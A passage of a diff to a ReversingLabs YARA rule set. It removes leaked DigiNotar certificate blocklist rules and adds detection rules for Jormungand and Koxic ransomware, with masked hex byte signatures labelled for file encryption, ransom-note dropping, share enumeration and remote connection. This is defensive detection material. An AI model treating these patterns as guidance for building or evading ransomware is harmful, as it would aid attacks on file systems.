+            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ??
+            ?? ?? ?? F3 A5 A4 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 A4
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95
+            ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? E8
+        }
+		$dumping_function111 = {
+            68 ?? ?? ?? ?? 8D 55 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 39 58 ?? 72 ?? 8B 40 ?? EB
+            ?? 83 C0 ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 5D ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8
+        }
+		$dumping_function2 = {
+            55 8B EC 51 53 8B 5D ?? 56 68 ?? ?? ?? ?? 8D 45 ?? 53 50 33 F6 E8 ?? ?? ?? ?? 8B 4D
+            ?? 68 ?? ?? ?? ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            83 F8 ?? 74 ?? 57 8B 7D ?? 0F BE 14 3E 8B 4D ?? 51 33 D0 52 E8 ?? ?? ?? ?? 8B C7 83
+            C4 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 8D 4E ?? 8B D1 2B D0
+            8B 45 ?? F7 DA 1B D2 23 D1 50 8B F2 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 5F 8B 4D
+            ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B 8B
+            E5 5D C2
+        }
+		$lib_loader = {
+            68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ??
+            ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57
+        }
+		$exception1 = {
+            B8 ?? ?? ?? ?? 50 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 33 C0 89 08
+        }
+		$exception2 = {
+            55 53 51 57 56 52 8D 98 ?? ?? ?? ?? 8B 53 ?? 52 8B E8 6A ?? 68 ?? ?? ?? ?? FF 73 ??
+            6A ?? 8B 4B ?? 03 CA 8B 01 FF D0
+        }
+		$exceptionallock = {
+            B8 ?? ?? ?? ?? 8D 88 ?? ?? ?? ?? 89 41 ?? 8B 54 24 ?? 8B 52 ?? C6 02 ?? 83 C2 ??
+            2B CA 89 4A ?? 33 C0 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Overheid en Bedrijven" and pe.signatures [ i ] . serial == "01:31:69:b0" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $payload and ( $NSIS_CheckIntegrity or ( $UPX_Decompression and $UPX_Encrypting ) or $NSIS_ErrorPart or $dumping_functionv2014 or $dumping_functionMidVersion or ( $exception1 and $exception2 and $exceptionallock ) or $dumping_functionP or $dumping_functionE or $dumping_functionB or $dumping_function111 or $dumping_function2 or $lib_loader )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0C76Da9C910C4E2C9Efe15D058933C4C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Jormungand : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Jormungand ransomware."
 		author = "ReversingLabs"
-		id = "a9b06d49-1ab2-539e-bd1f-16da40b654b2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "418c3d9f-2338-593f-a8ec-a1e25afa50d4"
+		date = "2021-10-22"
+		modified = "2021-10-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L873-L889"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "883e93bff42161ba68f69fb17f7e78377d7f3cb6b6cdf72cffb4166466f8bc7b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Jormungand.yara#L1-L135"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "049eb4533b37d8d72e50dd1e803a897758386643770d47b3e7690f58e44d5236"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Jormungand"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_469C2Caf : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "12d7c4a8-0a84-502a-855b-674972a2e2e1"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L891-L907"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2490dbd74a5d3eede494d284f96af835c270d2fb0752b887aadbaf92bf34e6d4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$drop_ransom_note = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
+            ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ??
+            ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89
+            84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 54 24 ?? 89 14 24 8B 94 24 ?? ?? ?? ??
+            89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ??
+            8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24
+            ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24
+            ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 89
+            5C 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ??
+            8D 4C 24 ?? 89 0C 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C
+            24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 8D
+            44 24 ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ??
+            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? E8 ?? ??
+            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 89 44 24 ??
+            89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? C3 E8
+        }
+		$encrypt_files_aes = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 44 24
+            ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24
+            ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 4C 24 ?? 8B 50 ??
+            89 0C 24 FF D2 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ??
+            89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24
+            ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 89
+            1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B
+            44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 54 24 ??
+            89 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24
+            ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ??
+            8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ??
+            89 2C 24 FF D3 8B 05 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44
+            24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89
+            4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 C4 ?? C3 E8
+        }
+		$encrypt_files_rsa = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24
+            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B
+            44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 50 ?? 8B 40 ?? 89 0C 24 89 54 24 ?? 89
+            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 75 ??
+            8D 15 ?? ?? ?? ?? 39 D0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 04
+            24 89 54 24 ?? 89 4C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C
+            24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 83 C4 ?? C3 C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C
+            24 ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C7 40 ?? ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8D 0D ?? ?? ?? ?? 89 08 C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? 89
+            44 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 04 24 8D 0D ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ?? ??
+            ?? 8B 44 24 ?? EB ?? 89 04 24 89 54 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ??
+            ?? 0F 0B
+        }
+		$find_files = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ??
+            ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44
+            24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ??
+            ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ??
+            ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 90 E8 ?? ?? ?? ?? 83
+            C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 E8
+        }
+		$remote_connection_p1 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24
+            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D
+            05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ??
+            8D 0D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C6 40 ?? ?? 8B 0D ?? ?? ?? ??
+            8B 54 24 ?? 8D 5A ?? 85 C9 0F 85 ?? ?? ?? ?? 89 42 ?? 8D 05 ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8D 0D
+            ?? ?? ?? ?? 89 08 8B 0D ?? ?? ?? ?? 8D 50 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 89
+            48 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B
+            44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44
+            24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
+            8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ??
+            ?? 8B 4C 24 ?? 89 08 C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40
+        }
+		$remote_connection_p2 = {
+            C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 4C 24
+            ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 4C
+            24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 05 ?? ?? ??
+            ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C
+            24 ?? 8B 54 24 ?? 89 0C 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 0C
+            24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3
+            8B 48 ?? 84 01 8B 40 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 41 ?? 89 44 24 ?? E8 ??
+            ?? ?? ?? 85 C0 75 ?? EB ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8B 4C 24 ?? 89 4C
+            24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 89 14 24 8B 44 24 ?? 89 44 24 ?? E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 90 E8
+            ?? ?? ?? ?? 83 C4 ?? C3 E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "46:9c:2c:af" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( all of ( $remote_connection_p* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_469C3Cc9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Koxic : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Koxic ransomware."
 		author = "ReversingLabs"
-		id = "36d76a9f-d18f-56bf-b00a-f7320f04f39a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "73c4afb0-cfa8-5bc5-bca3-49a7710f4ab9"
+		date = "2022-04-21"
+		modified = "2022-04-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L909-L925"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7327b7cbeb616bc46c82975aed6b3ea1caafa74fd431e2d98ca55b00851e22c8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Koxic.yara#L1-L87"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "739faf047b95fd538422a42943fcaad6538549bf4cf33ed91385c61365af4f09"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Koxic"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_shares_p1 = {
+            8B 45 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D
+            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B
+            55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? C1
+            E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B
+        }
+		$enum_shares_p2 = {
+            54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ??
+            0F B6 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 83 E8 ?? 89 45 ?? EB ?? 8B 55 ?? 83 EA ?? 89 55 ?? 83 7D ?? ??
+            0F 8C ?? ?? ?? ?? 8B 45 ?? 0F B7 8C 45 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55
+            ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? C6 45 ?? ?? EB ?? 8B 4D ?? 8D 94 4D ?? ??
+            ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C9 8B 55 ?? 66 89 8C 55 ?? ?? FF
+            FF 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85
+            ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 EA ?? 89
+            55 ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B
+            45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
+            ?? C1 E0 ?? 03 45 ?? B9 ?? ?? ?? ?? 6B D1 ?? 89 44 15 ?? B8 ?? ?? ?? ?? C1 E0 ?? 8B
+            4D ?? 89 4C 05 ?? BA ?? ?? ?? ?? D1 E2 8B 45 ?? 89 44 15 ?? 8D 4D ?? 51 E8 ?? ?? ??
+            ?? 83 C4 ?? E9 ?? ?? ?? ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? EB ?? 81 7D ?? ?? ?? ??
+            ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? B8 ?? ?? ?? ?? EB ?? 33 C0
+        }
+		$find_files = {
+            8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 33 D2 8B 45 ?? 66 89 10
+            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 83 F8 ?? 75 ?? E9 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 44 02 ?? 3D ?? ?? ?? ??
+            72 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B
+            48 ?? 81 79 ?? ?? ?? ?? ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 8B 95 ?? ?? ?? ?? 83
+            E2 ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B 0D ?? ?? ?? ?? 51
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D
+            ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E2 ?? 8B 45 ?? 89 44 15 ?? 8D 4D
+            ?? 51 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 75 ?? 6A ?? A1
+        }
+		$encrypt_files = {
+            8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ??
+            E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 4D ?? 2B C8 8B
+            45 ?? 1B C2 89 4D ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 50
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ??
+            81 7D ?? ?? ?? ?? ?? 73 ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 FF
+            15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            EB ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89
